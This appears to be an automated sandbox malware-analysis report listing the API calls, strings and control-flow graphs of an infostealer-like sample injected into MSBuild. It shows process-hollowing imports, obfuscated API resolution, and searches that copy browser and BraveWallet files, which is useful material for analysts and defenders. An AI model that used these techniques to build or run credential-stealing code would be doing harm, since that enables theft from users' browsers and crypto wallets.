94668 40fde0 GetLogicalProcessorInformationEx 94006->94668 94008 414c52 94009 40f9a0 3 API calls 94008->94009 94010 414c5f 94009->94010 94011 40f8f0 lstrcpyA 94010->94011 94012 414c68 94011->94012 94013 40f9a0 3 API calls 94012->94013 94014 414c81 94013->94014 94015 40f8f0 lstrcpyA 94014->94015 94016 414c8a 94015->94016 94017 40f9a0 3 API calls 94016->94017 94018 414ca3 94017->94018 94019 40f8f0 lstrcpyA 94018->94019 94020 414cac 94019->94020 94682 40fda0 GetSystemInfo wsprintfA 94020->94682 94022 414cb9 94023 40f9a0 3 API calls 94022->94023 94024 414cc6 94023->94024 

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(74DD0000,CreateProcessA), ref: 00417E6A
                                                                                        • GetProcAddress.KERNEL32(74DD0000,GetThreadContext), ref: 00417E80
                                                                                        • GetProcAddress.KERNEL32(74DD0000,ReadProcessMemory), ref: 00417E97
                                                                                        • GetProcAddress.KERNEL32(74DD0000,VirtualAllocEx), ref: 00417EAE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,ResumeThread), ref: 00417EC4
                                                                                        • GetProcAddress.KERNEL32(74DD0000,WriteProcessMemory), ref: 00417EDB
                                                                                        • GetProcAddress.KERNEL32(74DD0000,SetThreadContext), ref: 00417EF2
                                                                                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417F8F
                                                                                        • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00418495
                                                                                        • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004184AC
                                                                                        • GetProcAddress.KERNEL32(6CF50000,SymMatchString), ref: 004185AC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                        • API String ID: 2238633743-2740034357
                                                                                        • Opcode ID: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
                                                                                        • Instruction ID: 063c43ef11668f3b4bcf1e06991fb7fc39d12d8cee9b34c79393d9f3b317e2b6
                                                                                        • Opcode Fuzzy Hash: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
                                                                                        • Instruction Fuzzy Hash: 5A6211B9A106009FD714DFA5EE8A9263BFBF7C87013147519EA06C3364E7B8A841CF95

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402014
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040201B
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402022
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402029
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402030
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040203B
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402042
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402052
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402059
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402060
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402067
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040206E
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402079
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402080
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402087
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040208E
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402095
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020AB
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B2
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B9
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C0
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C7
                                                                                        • lstrlenA.KERNEL32(?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020CF
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F0
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F7
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020FE
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402105
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040210C
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040211C
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402123
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040212A
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402131
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402138
                                                                                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 0040214D
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402158
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040215F
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402166
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040216D
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402174
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtual
                                                                                        • String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
                                                                                        • API String ID: 2533436356-3600131318
                                                                                        • Opcode ID: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
                                                                                        • Instruction ID: 155b361810c2162a8ce7a193311da36ac5826eab53bfc95ccb16ddaea6ec9530
                                                                                        • Opcode Fuzzy Hash: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
                                                                                        • Instruction Fuzzy Hash: C131BA21F8033CF79660EBED6C4AF5E6EF5FF8CB50BA0425779085558289A85401CEAF

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1260 414f80-414fee call 41c800 wsprintfA FindFirstFileA memset * 2 1263 414ff4-415000 1260->1263 1264 41538c-4153b2 call 40f890 * 4 1260->1264 1265 415003-415017 StrCmpCA 1263->1265 1267 415369-41537c FindNextFileA 1265->1267 1268 41501d-415031 StrCmpCA 1265->1268 1267->1265 1270 415382-415386 FindClose 1267->1270 1268->1267 1271 415037-415068 wsprintfA StrCmpCA 1268->1271 1270->1264 1273 415093-4150b0 wsprintfA 1271->1273 1274 41506a-415091 wsprintfA 1271->1274 1276 4150b3-4150f1 memset lstrcatA strtok_s 1273->1276 1274->1276 1278 4150f3-415105 1276->1278 1279 415122-415160 memset lstrcatA strtok_s 1276->1279 1282 415306-41530e 1278->1282 1290 41510b-415120 strtok_s 1278->1290 1279->1282 1283 415166-415176 PathMatchSpecA 1279->1283 1282->1267 1285 415310-41531e 1282->1285 1287 415267-41527c strtok_s 1283->1287 1288 41517c-41524e call 40f810 call 410b80 call 40f9a0 call 40f940 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 5 call 40fa50 DeleteFileA call 40fa50 CopyFileA call 40fa50 call 410f90 call 41c880 1283->1288 1285->1270 1289 415320-415328 1285->1289 1287->1283 1292 415282 1287->1292 1331 415250-415262 call 40fa50 DeleteFileA call 40f890 1288->1331 1332 415287-415298 1288->1332 1289->1267 1293 41532a-41535e call 401080 call 414f80 1289->1293 1290->1278 1290->1279 1292->1282 1301 415363 1293->1301 1301->1267 1331->1287 1333 4153b3-4153bb call 40f890 1332->1333 1334 41529e-4152be call 40f850 call 406c20 1332->1334 1333->1264 1344 4152c0-4152f9 call 40f810 call 401080 call 4142a0 call 40f890 1334->1344 1345 4152fe-415301 call 40f890 1334->1345 1344->1345 1345->1282
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 00414FA0
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414FB7
                                                                                        • memset.MSVCRT ref: 00414FD0
                                                                                        • memset.MSVCRT ref: 00414FE3
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0041500F
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415029
                                                                                        • wsprintfA.USER32 ref: 0041504E
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9), ref: 00415060
                                                                                        • wsprintfA.USER32 ref: 00415088
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • wsprintfA.USER32 ref: 004150AA
                                                                                        • memset.MSVCRT ref: 004150C1
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004150D1
                                                                                        • strtok_s.MSVCRT ref: 004150E7
                                                                                        • strtok_s.MSVCRT ref: 00415116
                                                                                        • memset.MSVCRT ref: 00415130
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415140
                                                                                        • strtok_s.MSVCRT ref: 00415156
                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041516E
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,?,016996B0,?,?,?,004201E0,?,00000000,?,004201E9), ref: 0041520F
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415227
                                                                                          • Part of subcall function 00410F90: CreateFileA.KERNEL32(;RA,80000000,00000003,00000000,00000003,00000080,00000000,?,0041523B,00000000,?,004201E9), ref: 00410FAD
                                                                                          • Part of subcall function 00410F90: GetFileSizeEx.KERNEL32(00000000,?,?,004201E9), ref: 00410FBF
                                                                                          • Part of subcall function 00410F90: CloseHandle.KERNEL32(00000000,?,004201E9), ref: 00410FCA
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00415247
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,004201E9), ref: 00415259
                                                                                        • strtok_s.MSVCRT ref: 00415272
                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415374
                                                                                        • FindClose.KERNEL32(?), ref: 00415386
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
                                                                                        • String ID: %s\%s$%s\%s\%s$%s\*.*
                                                                                        • API String ID: 3252185717-1853381274
                                                                                        • Opcode ID: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
                                                                                        • Instruction ID: 996867c3883e5c4f9d14c97c6daec3073e0067922b1a953186596bd2cd2b31e7
                                                                                        • Opcode Fuzzy Hash: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
                                                                                        • Instruction Fuzzy Hash: 21C19B72900208ABDB24EBB1DC45FEE737CAF44704F54456EF915A6181EF78AB48CBA4

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1354 4176e0-41770b GetPEB 1355 417711-41791d call 406ac0 GetProcAddress * 20 1354->1355 1356 417922-417981 LoadLibraryA * 5 1354->1356 1355->1356 1358 417983-417991 GetProcAddress 1356->1358 1359 417996-41799d 1356->1359 1358->1359 1360 4179ca-4179d1 1359->1360 1361 41799f-4179c5 GetProcAddress * 2 1359->1361 1363 4179d3-4179e1 GetProcAddress 1360->1363 1364 4179e6-4179ed 1360->1364 1361->1360 1363->1364 1365 417a02-417a09 1364->1365 1366 4179ef-4179fd GetProcAddress 1364->1366 1368 417a36-417a39 1365->1368 1369 417a0b-417a31 GetProcAddress * 2 1365->1369 1366->1365 1369->1368
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA20), ref: 00417748
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB10), ref: 00417761
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB28), ref: 00417779
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A930), ref: 00417791
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168EE38), ref: 004177AA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696630), ref: 004177C2
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696610), ref: 004177DA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A978), ref: 004177F3
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AAC8), ref: 0041780B
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA50), ref: 00417823
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA68), ref: 0041783C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016964F0), ref: 00417854
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A9A8), ref: 0041786C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A9C0), ref: 00417885
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016965B0), ref: 0041789D
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA80), ref: 004178B5
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AAF8), ref: 004178CE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016965D0), ref: 004178E6
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB58), ref: 004178FE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696510), ref: 00417917
                                                                                        • LoadLibraryA.KERNEL32(0168AAE0), ref: 00417928
                                                                                        • LoadLibraryA.KERNEL32(0168A888), ref: 0041793A
                                                                                        • LoadLibraryA.KERNEL32(0168AB88), ref: 0041794C
                                                                                        • LoadLibraryA.KERNEL32(0168ABA0), ref: 0041795D
                                                                                        • LoadLibraryA.KERNEL32(0168ABB8), ref: 0041796F
                                                                                        • GetProcAddress.KERNEL32(75A70000,0168ABD0), ref: 0041798B
                                                                                        • GetProcAddress.KERNEL32(75290000,0168ABE8), ref: 004179A7
                                                                                        • GetProcAddress.KERNEL32(75290000,0168AC00), ref: 004179BF
                                                                                        • GetProcAddress.KERNEL32(75BD0000,0168AC18), ref: 004179DB
                                                                                        • GetProcAddress.KERNEL32(75450000,01696390), ref: 004179F7
                                                                                        • GetProcAddress.KERNEL32(76E90000,0168EF18), ref: 00417A13
                                                                                        • GetProcAddress.KERNEL32(76E90000,01690D70), ref: 00417A2B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 2238633743-0
                                                                                        • Opcode ID: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
                                                                                        • Instruction ID: 2148604ec22d5dc409469944cda03c78a345716d380cb9a295fa5105f019d802
                                                                                        • Opcode Fuzzy Hash: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
                                                                                        • Instruction Fuzzy Hash: 7CA162B5A116009FD714DFA5EE899263BFBF7C8701308751AEA06C3364E7B8A805CF95

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,004201E9,004201E9,00000000,?,?,?,004234C0,004201E9,?,00000000,?), ref: 0040C35C
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040C38C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040C3A6
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040C43F
                                                                                        • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,004201E0,?,0169A250,?,004201E0,?,0169A1A0,00000000,?,?,?,004201E0), ref: 0040C5D6
                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040C5F0
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6B4
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 0040C77B
                                                                                        • StrCmpCA.SHLWAPI(?,01699740), ref: 0040C7AF
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
                                                                                          • Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
                                                                                          • Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(?,0169A1A0), ref: 0040C813
                                                                                          • Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(00000000,0169A250), ref: 0040C82D
                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040CD02
                                                                                        • FindClose.KERNEL32(?), ref: 0040CD14
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                        • API String ID: 480569104-1189830961
                                                                                        • Opcode ID: 1b104ade175e4c79d037078ebf40eb43ea0de751dbf22e7c923f55d6729e68dd
                                                                                        • Instruction ID: cbba04a03a0008995a9987146006101dde6cfe135f2cf04865d7d56680781c26
                                                                                        • Opcode Fuzzy Hash: 1b104ade175e4c79d037078ebf40eb43ea0de751dbf22e7c923f55d6729e68dd
                                                                                        • Instruction Fuzzy Hash: 8B522D72910108ABCB24FB71DC56EEE7379AB54304F40857EF906B25D1EF386A4CCAA5

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
                                                                                        • __aulldiv.LIBCMT ref: 6C5636E4
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C563773
                                                                                        • EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C56377E
                                                                                        • LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C5637BD
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C5637C4
                                                                                        • EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C5637CB
                                                                                        • LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C563801
                                                                                        • __aulldiv.LIBCMT ref: 6C563883
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C563902
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C563918
                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C56394C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                        • API String ID: 301339242-3790311718
                                                                                        • Opcode ID: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
                                                                                        • Instruction ID: 0c7caf911d8f142f4d7d8f97e1338ebd902a57981a2e469cd841cf4ed2ca025d
                                                                                        • Opcode Fuzzy Hash: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
                                                                                        • Instruction Fuzzy Hash: 0FB1C6B1B093109FDB48DF29DC4461ABBF5BB8E704F068A2DE499D7760DB709900CB89

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 00415EBC
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
                                                                                        • wsprintfA.USER32 ref: 00415F3B
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
                                                                                        • wsprintfA.USER32 ref: 00415F67
                                                                                        • wsprintfA.USER32 ref: 00415F86
                                                                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
                                                                                        • lstrcatA.KERNEL32(?,0169A440,?,000003E8), ref: 00415FC3
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415FE3
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00416009
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00416160
                                                                                        • FindClose.KERNEL32(?), ref: 00416172
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                                                                        • String ID: %s\%s$%s\*
